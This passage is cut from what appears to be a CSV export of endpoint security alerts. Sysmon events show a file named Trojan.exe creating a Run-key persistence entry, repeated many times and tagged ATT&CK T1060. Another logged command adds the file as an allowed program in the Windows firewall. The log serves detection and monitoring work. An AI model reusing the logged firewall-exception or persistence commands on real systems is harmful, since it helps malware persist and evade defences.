16:25:00.205"",""processGuid"":""{df9fc3d3-9fdc-5eca-0000-0010417a0c00}"",""processId"":""4804"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\netsh.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Network Command Shell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""netsh.exe"",""commandLine"":""netsh firewall add allowedprogram \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" \\\""Trojan.exe\\\"" ENABLE"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-9fb6-5eca-0000-0020f3660300}"",""logonId"":""0x366f3"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7"",""parentProcessGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""parentProcessId"":""6484"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}", +"May 24, 2020 @ 16:24:34.273",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 24, 2020 @ 16:24:24.739",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 24, 2020 @ 16:23:36.689",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 24, 2020 @ 16:23:36.675",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Capabilities' checksum changed. 
+Old md5sum was: '031a2ac02f3ad0395ebc66e870d3f7a1' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '02327737fea3871d2b8ede52654439d116f38683' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 24, 2020 @ 16:23:23.961",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:10.814 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:10.833661400Z"",""eventRecordID"":""1597"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:10.814\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:26:10.814"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:22.952",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:09.799 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:09.803356600Z"",""eventRecordID"":""1596"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:09.799\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:09.799"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:21.915",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:08.767 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:08.770400200Z"",""eventRecordID"":""1595"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:08.767\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:08.767"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:23:21.404",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:07.721 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:07.723604100Z"",""eventRecordID"":""1594"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:07.721\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:26:07.721"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:21.263",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:06.705 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:06.721086900Z"",""eventRecordID"":""1590"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:06.705\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:06.705"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:20.979",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:05.659 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:05.662087900Z"",""eventRecordID"":""1588"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:05.659\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:05.659"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:23:17.824",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:04.642 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:04.648673500Z"",""eventRecordID"":""1584"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:04.642\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:26:04.642"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:16.759",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:03.618 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:03.624888500Z"",""eventRecordID"":""1583"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:03.618\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:03.618"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:15.753",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:02.581 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:02.583411800Z"",""eventRecordID"":""1581"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:02.581\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:02.581"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:23:14.688",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:01.564 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:01.566301200Z"",""eventRecordID"":""1579"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:01.564\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
